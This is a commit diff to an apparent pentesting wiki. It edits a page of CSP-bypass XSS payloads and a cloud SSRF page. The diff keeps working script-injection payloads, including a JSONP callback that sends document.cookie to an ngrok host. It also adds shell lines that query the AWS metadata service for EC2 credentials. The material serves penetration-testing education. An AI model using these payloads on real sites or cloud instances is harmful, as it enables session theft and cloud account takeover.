GitBook: [#3635] No subject

pentesting-web/content-security-policy-csp-bypass/README.md

@@ -128,18 +128,6 @@ Working payload:
 "/>'><script src=data:text/javascript,alert(1337)></script>
 ```
 
-### Whitelisted data:
-
-```yaml
-Content-Security-Policy: script-src data: ;
-```
-
-Working payload:
-
-```html
-<script src=data:text/javascript,alert(1337)></script>
-```
-
 ### Lack of object-src and default-src
 
 {% hint style="danger" %}
@@ -154,7 +142,7 @@ Working payloads:
 
 ```markup
 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
-">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
+">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
 <param name="AllowScriptAccess" value="always"></object>
 ```
 
@@ -218,10 +206,9 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
 ```markup
 "><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
 "><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
-"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>
 ```
 
-****[**JSONBee**](https://github.com/zigoo0/JSONBee) **** contains **ready to use JSONP endpoints** to CSP bypass of different websites.
+[JSONBee](https://github.com/zigoo0/JSONBee) contains ready to use JSONP endpoints to CSP bypass of different websites.
 
 The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
 
@@ -538,7 +525,6 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y
 * [https://lcamtuf.coredump.cx/postxss/](https://lcamtuf.coredump.cx/postxss/)
 * [https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d](https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)
 * [https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme](https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme)
-* [https://www.cobalt.io/blog/csp-and-bypasses](https://www.cobalt.io/blog/csp-and-bypasses)
 
 ​
 

pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md

@@ -79,9 +79,15 @@ echo ""
 echo "User Data"
 # Search hardcoded credentials
 eval $aws_req "http://169.254.169.254/latest/user-data"
+
+echo ""
+echo "EC2 Security Credentials"
+eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
 ```
 
-As a publicly available IAM credentials exposed example you can visit: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
+As a **publicly available IAM credentials** exposed example you can visit: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
+
+You can also check public **EC2 security credentials** in: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance)
 
 You can then take **those credentials and use them with the AWS CLI**. This will allow you to do **anything that role has permissions** to do.